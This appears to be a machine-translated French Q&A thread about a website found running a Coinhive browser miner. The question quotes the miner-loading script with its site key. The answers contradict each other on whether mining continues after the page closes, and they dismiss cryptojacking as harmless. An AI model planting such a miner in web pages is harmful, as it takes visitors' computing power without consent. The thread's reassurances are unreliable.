Site avec un script de mineur Bitcoin
J'ai trouvé certains de mes utilisateurs visitant un site qui semblait avoir un script JS d'exploration de Bitcoin dans son code:
<script src = "hxxps://coin-Hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
Ma question est la suivante: les utilisateurs sont-ils toujours infectés même s'ils s'éloignent de la page? Ces types de programmes fonctionnent-ils uniquement lorsque l'utilisateur a la page ouverte dans le navigateur?
avec cela, les utilisateurs sont-ils toujours infectés même s'ils s'éloignent de la page?
Non
Ces types de programmes fonctionnent-ils uniquement lorsque l'utilisateur a la page ouverte dans le navigateur?
Oui, le script ne s'exécutera que sur le site Web qui l'inclut, tandis que la page est ouverte dans le navigateur
AMÉLIORER:
Plus d'informations sur ce script: https://coin-Hive.com/
Coinhive propose un mineur JavaScript pour la chaîne de blocs Monero (...) que vous pouvez intégrer dans votre site Web. Vos utilisateurs exécutent le mineur directement dans leur navigateur
Et https://coin-Hive.com/documentation/miner
Le mineur s'exécute jusqu'à ce que vous l'arrêtiez explicitement à nouveau ou jusqu'à ce que l'utilisateur s'éloigne .
Coinhive ne semble pas être un "malware" car il ne semble pas faire quoi que ce soit de particulièrement nuisible à l'ordinateur de l'utilisateur. Si tel est le cas, les ordinateurs des utilisateurs n'ont jamais été "infectés" par quoi que ce soit.
Il est extrêmement courant de nos jours que les sites Web chargent des tonnes de scripts et de cookies tiers en arrière-plan et fassent des centaines de choses dont vous n'êtes pas au courant chaque fois que vous utilisez Internet. La plupart des sites chargent un script de suivi Google Analytics lorsque vous les visitez, même si vous ne les avez pas autorisés à le faire. Mais cela ne serait pas considéré comme un malware. La plupart des sites chargent des cookies tiers persistants qui suivent votre présence d'un site Web à un autre et créent un profil massif de vos habitudes en ligne. C'est pourquoi vous pouvez acheter des chaussures sur un seul site, puis découvrir soudainement que Facebook vous propose des annonces de chaussures. Mais cela n'est généralement pas considéré comme un malware.
En termes de "préjudice" ou "activité indésirable", le suivi persistant pourrait être considéré comme plus invasif qu'un script d'extraction de pièces. Le script de minage de pièces utilise probablement une partie de la mémoire et de la puissance CPU de l'ordinateur de l'utilisateur final, ce qui n'est pas différent des centaines d'autres bibliothèques javascript qui se chargent en arrière-plan à votre insu.
Je ne connais pas le service Coin-Hive, mais en fait le script que vous avez fourni contient de telles lignes:
var JobThread = function() {
this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
this.worker.onmessage = this.onReady.bind(this);
...
};
Comme vous le voyez, il utilise Workers. Je n'étais pas en train d'enquêter sur le script dans son intégralité, mais de toute façon, l'utilisation de web workers signifie que certaines opérations peuvent être exécutées même après la fermeture de la page. Plus d'informations dans ce post .
Donc, la toute première réponse à votre question est OUI, les utilisateurs peuvent être infectés pendant un certain temps après la fermeture de la page (en théorie, si le script est écrit en de cette façon).
Mais en réalité, le script semble être terminé très bientôt par le système lui-même. La plate-forme Coin-Hive n'est pas non plus positionnée comme un malware et devrait être sûre pour le système des utilisateurs. Je ne pense pas que vous devriez vous en soucier du tout.